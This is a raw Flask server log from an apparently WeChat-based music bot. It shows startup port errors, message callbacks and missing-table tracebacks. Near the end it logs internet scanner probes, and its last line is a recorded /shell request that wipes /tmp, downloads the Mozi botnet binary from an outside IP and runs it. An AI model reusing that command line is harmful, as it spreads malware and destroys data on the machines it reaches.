 * Serving Flask app "main" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
Traceback (most recent call last):
  File "/var/www/papuwx/main.py", line 691, in <module>
    Manager(app).run()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/__init__.py", line 417, in run
    result = self.handle(argv[0], argv[1:])
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/__init__.py", line 386, in handle
    res = handle(*args, **config)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/commands.py", line 479, in __call__
    **self.server_options)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 990, in run
    run_simple(host, port, self, **options)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 1008, in run_simple
    inner()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 957, in inner
    fd=fd,
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 796, in make_server
    host, port, app, request_handler, passthrough_errors, ssl_context, fd=fd
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 686, in __init__
    super().__init__(server_address, handler)  # type: ignore
  File "/usr/lib/python3.6/socketserver.py", line 456, in __init__
    self.server_bind()
  File "/usr/lib/python3.6/http/server.py", line 136, in server_bind
    socketserver.TCPServer.server_bind(self)
  File "/usr/lib/python3.6/socketserver.py", line 470, in server_bind
    self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
 * Serving Flask app "main" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
Traceback (most recent call last):
  File "/var/www/papuwx/main.py", line 691, in <module>
    Manager(app).run()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/__init__.py", line 417, in run
    result = self.handle(argv[0], argv[1:])
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/__init__.py", line 386, in handle
    res = handle(*args, **config)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/commands.py", line 479, in __call__
    **self.server_options)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 990, in run
    run_simple(host, port, self, **options)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 1008, in run_simple
    inner()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 957, in inner
    fd=fd,
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 796, in make_server
    host, port, app, request_handler, passthrough_errors, ssl_context, fd=fd
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 686, in __init__
    super().__init__(server_address, handler)  # type: ignore
  File "/usr/lib/python3.6/socketserver.py", line 456, in __init__
    self.server_bind()
  File "/usr/lib/python3.6/http/server.py", line 136, in server_bind
    socketserver.TCPServer.server_bind(self)
  File "/usr/lib/python3.6/socketserver.py", line 470, in server_bind
    self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
 * Serving Flask app "main" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
Traceback (most recent call last):
  File "/var/www/papuwx/main.py", line 691, in <module>
    Manager(app).run()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/__init__.py", line 417, in run
    result = self.handle(argv[0], argv[1:])
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/__init__.py", line 386, in handle
    res = handle(*args, **config)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/commands.py", line 479, in __call__
    **self.server_options)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 990, in run
    run_simple(host, port, self, **options)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 1008, in run_simple
    inner()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 957, in inner
    fd=fd,
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 796, in make_server
    host, port, app, request_handler, passthrough_errors, ssl_context, fd=fd
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 686, in __init__
    super().__init__(server_address, handler)  # type: ignore
  File "/usr/lib/python3.6/socketserver.py", line 456, in __init__
    self.server_bind()
  File "/usr/lib/python3.6/http/server.py", line 136, in server_bind
    socketserver.TCPServer.server_bind(self)
  File "/usr/lib/python3.6/socketserver.py", line 470, in server_bind
    self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
 * Serving Flask app "main" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
Traceback (most recent call last):
  File "/var/www/papuwx/main.py", line 691, in <module>
    Manager(app).run()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/__init__.py", line 417, in run
    result = self.handle(argv[0], argv[1:])
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/__init__.py", line 386, in handle
    res = handle(*args, **config)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/commands.py", line 479, in __call__
    **self.server_options)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 990, in run
    run_simple(host, port, self, **options)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 1008, in run_simple
    inner()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 957, in inner
    fd=fd,
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 796, in make_server
    host, port, app, request_handler, passthrough_errors, ssl_context, fd=fd
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 686, in __init__
    super().__init__(server_address, handler)  # type: ignore
  File "/usr/lib/python3.6/socketserver.py", line 456, in __init__
    self.server_bind()
  File "/usr/lib/python3.6/http/server.py", line 136, in server_bind
    socketserver.TCPServer.server_bind(self)
  File "/usr/lib/python3.6/socketserver.py", line 470, in server_bind
    self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
 * Serving Flask app "main" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
Traceback (most recent call last):
  File "/var/www/papuwx/main.py", line 691, in <module>
    Manager(app).run()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/__init__.py", line 417, in run
    result = self.handle(argv[0], argv[1:])
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/__init__.py", line 386, in handle
    res = handle(*args, **config)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask_script/commands.py", line 479, in __call__
    **self.server_options)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 990, in run
    run_simple(host, port, self, **options)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 1008, in run_simple
    inner()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 957, in inner
    fd=fd,
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 796, in make_server
    host, port, app, request_handler, passthrough_errors, ssl_context, fd=fd
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 686, in __init__
    super().__init__(server_address, handler)  # type: ignore
  File "/usr/lib/python3.6/socketserver.py", line 456, in __init__
    self.server_bind()
  File "/usr/lib/python3.6/http/server.py", line 136, in server_bind
    socketserver.TCPServer.server_bind(self)
  File "/usr/lib/python3.6/socketserver.py", line 470, in server_bind
    self.socket.bind(self.server_address)
OSError: [Errno 98] Address already in use
 * Serving Flask app "main" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
 * Serving Flask app "main" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: off
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
127.0.0.1 - - [30/Aug/2021 23:50:58] "POST /papuwx/?signature=b0ccd4a4d19afd820d416110fc0d12bb726a2156&timestamp=1630338658&nonce=1300980848&openid=op3adjpkIjN9WPDSOl0E8sc5HN2M HTTP/1.0" 200 -
127.0.0.1 - - [30/Aug/2021 23:52:47] "POST /papuwx/?signature=a22fa2839f78b313a478eed3239aca990a9d1d3b&timestamp=1630338767&nonce=1890272518&openid=op3adjpkIjN9WPDSOl0E8sc5HN2M HTTP/1.0" 200 -
127.0.0.1 - - [30/Aug/2021 23:53:55] "POST /papuwx/?signature=6ad21e60b120299f5698449bf2fac76bc5c6544e&timestamp=1630338835&nonce=231072970&openid=op3adjpkIjN9WPDSOl0E8sc5HN2M HTTP/1.0" 200 -
127.0.0.1 - - [30/Aug/2021 23:58:14] "POST /papuwx/?signature=ecc7fe16ec5b35e545acc32adba93c41dfbb407f&timestamp=1630339094&nonce=1549181698&openid=op3adjpkIjN9WPDSOl0E8sc5HN2M HTTP/1.0" 200 -
127.0.0.1 - - [30/Aug/2021 23:58:49] "POST /papuwx/?signature=83a5b61c20128176051a8acc6c80616466c46346&timestamp=1630339129&nonce=1562087426&openid=op3adjpkIjN9WPDSOl0E8sc5HN2M HTTP/1.0" 200 -
127.0.0.1 - - [31/Aug/2021 00:01:50] "POST /papuwx/?signature=d2e99136ca57dfc868813eadec71d829c50dab53&timestamp=1630339310&nonce=1907941581&openid=op3adjpkIjN9WPDSOl0E8sc5HN2M HTTP/1.0" 200 -
127.0.0.1 - - [31/Aug/2021 01:16:07] "POST /papuwx/?signature=1df5e24097ccdaa881c3083f31e34ce938d8aa9d&timestamp=1630343767&nonce=783728677&openid=op3adjpkIjN9WPDSOl0E8sc5HN2M HTTP/1.0" 200 -
127.0.0.1 - - [31/Aug/2021 01:16:17] "POST /papuwx/?signature=b93b884a0303242776d3499929f752e925963f73&timestamp=1630343777&nonce=1143954471&openid=op3adjpkIjN9WPDSOl0E8sc5HN2M HTTP/1.0" 200 -
127.0.0.1 - - [31/Aug/2021 01:16:27] "POST /papuwx/?signature=cfa3a6918780cea980f3a46165b73f4f129022bc&timestamp=1630343787&nonce=161657454&openid=op3adjpkIjN9WPDSOl0E8sc5HN2M HTTP/1.0" 200 -
127.0.0.1 - - [31/Aug/2021 01:22:33] "[33mPOST /boaform/admin/formLogin HTTP/1.0[0m" 404 -
127.0.0.1 - - [31/Aug/2021 02:08:39] "[33mGET / HTTP/1.0[0m" 404 -
127.0.0.1 - - [31/Aug/2021 03:32:05] "[33mGET / HTTP/1.0[0m" 404 -
127.0.0.1 - - [31/Aug/2021 03:32:07] "[33mPOST /boaform/admin/formLogin HTTP/1.0[0m" 404 -
127.0.0.1 - - [31/Aug/2021 04:09:48] "[33mGET /config/getuser?index=0 HTTP/1.0[0m" 404 -
127.0.0.1 - - [31/Aug/2021 06:11:35] "[33mPOST /boaform/admin/formLogin HTTP/1.0[0m" 404 -
127.0.0.1 - - [31/Aug/2021 06:42:05] "[33mGET / HTTP/1.0[0m" 404 -
127.0.0.1 - - [31/Aug/2021 08:48:16] "[35m[1mPOST /papuwx/?signature=1e856d1f6ed076809a1ad8aa496def93750821a3&timestamp=1630370896&nonce=1344344004&openid=op3adjuHC2sBBOxx_oR-2CuPTwgU HTTP/1.0[0m" 500 -
Error on request:
Traceback (most recent call last):
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 319, in run_wsgi
    execute(self.server.app)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 308, in execute
    application_iter = app(environ, start_response)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 2464, in __call__
    return self.wsgi_app(environ, start_response)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 2450, in wsgi_app
    response = self.handle_exception(e)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1867, in handle_exception
    reraise(exc_type, exc_value, tb)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/_compat.py", line 39, in reraise
    raise value
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 2447, in wsgi_app
    response = self.full_dispatch_request()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1952, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1821, in handle_user_exception
    reraise(exc_type, exc_value, tb)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/_compat.py", line 39, in reraise
    raise value
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1950, in full_dispatch_request
    rv = self.dispatch_request()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1936, in dispatch_request
    return self.view_functions[rule.endpoint](**req.view_args)
  File "/var/www/papuwx/main.py", line 143, in index
    result = func()
  File "/var/www/papuwx/main.py", line 184, in processMessage
    replyDict.update(recommendMusic())
  File "/var/www/papuwx/main.py", line 275, in recommendMusic
    m = music.randomMusic()
  File "/var/www/papuwx/music.py", line 10, in randomMusic
    curs.execute('SELECT COUNT(*) FROM song')
sqlite3.OperationalError: no such table: song
127.0.0.1 - - [31/Aug/2021 08:48:16] "[35m[1mPOST /papuwx/?signature=1e856d1f6ed076809a1ad8aa496def93750821a3&timestamp=1630370896&nonce=1344344004&openid=op3adjuHC2sBBOxx_oR-2CuPTwgU HTTP/1.0[0m" 500 -
Error on request:
Traceback (most recent call last):
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 319, in run_wsgi
    execute(self.server.app)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 308, in execute
    application_iter = app(environ, start_response)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 2464, in __call__
    return self.wsgi_app(environ, start_response)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 2450, in wsgi_app
    response = self.handle_exception(e)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1867, in handle_exception
    reraise(exc_type, exc_value, tb)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/_compat.py", line 39, in reraise
    raise value
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 2447, in wsgi_app
    response = self.full_dispatch_request()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1952, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1821, in handle_user_exception
    reraise(exc_type, exc_value, tb)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/_compat.py", line 39, in reraise
    raise value
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1950, in full_dispatch_request
    rv = self.dispatch_request()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1936, in dispatch_request
    return self.view_functions[rule.endpoint](**req.view_args)
  File "/var/www/papuwx/main.py", line 143, in index
    result = func()
  File "/var/www/papuwx/main.py", line 184, in processMessage
    replyDict.update(recommendMusic())
  File "/var/www/papuwx/main.py", line 275, in recommendMusic
    m = music.randomMusic()
  File "/var/www/papuwx/music.py", line 10, in randomMusic
    curs.execute('SELECT COUNT(*) FROM song')
sqlite3.OperationalError: no such table: song
127.0.0.1 - - [31/Aug/2021 08:48:16] "[35m[1mPOST /papuwx/?signature=1e856d1f6ed076809a1ad8aa496def93750821a3&timestamp=1630370896&nonce=1344344004&openid=op3adjuHC2sBBOxx_oR-2CuPTwgU HTTP/1.0[0m" 500 -
Error on request:
Traceback (most recent call last):
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 319, in run_wsgi
    execute(self.server.app)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/werkzeug/serving.py", line 308, in execute
    application_iter = app(environ, start_response)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 2464, in __call__
    return self.wsgi_app(environ, start_response)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 2450, in wsgi_app
    response = self.handle_exception(e)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1867, in handle_exception
    reraise(exc_type, exc_value, tb)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/_compat.py", line 39, in reraise
    raise value
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 2447, in wsgi_app
    response = self.full_dispatch_request()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1952, in full_dispatch_request
    rv = self.handle_user_exception(e)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1821, in handle_user_exception
    reraise(exc_type, exc_value, tb)
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/_compat.py", line 39, in reraise
    raise value
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1950, in full_dispatch_request
    rv = self.dispatch_request()
  File "/var/www/papuwx/papuwx_venv/lib/python3.6/site-packages/flask/app.py", line 1936, in dispatch_request
    return self.view_functions[rule.endpoint](**req.view_args)
  File "/var/www/papuwx/main.py", line 143, in index
    result = func()
  File "/var/www/papuwx/main.py", line 184, in processMessage
    replyDict.update(recommendMusic())
  File "/var/www/papuwx/main.py", line 275, in recommendMusic
    m = music.randomMusic()
  File "/var/www/papuwx/music.py", line 10, in randomMusic
    curs.execute('SELECT COUNT(*) FROM song')
sqlite3.OperationalError: no such table: song
127.0.0.1 - - [31/Aug/2021 09:02:40] "[33mGET /config/getuser?index=0 HTTP/1.0[0m" 404 -
127.0.0.1 - - [31/Aug/2021 09:11:17] "[33mGET /shell?cd+/tmp;rm+-rf+*;wget+http://122.194.51.126:49784/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0[0m" 404 -
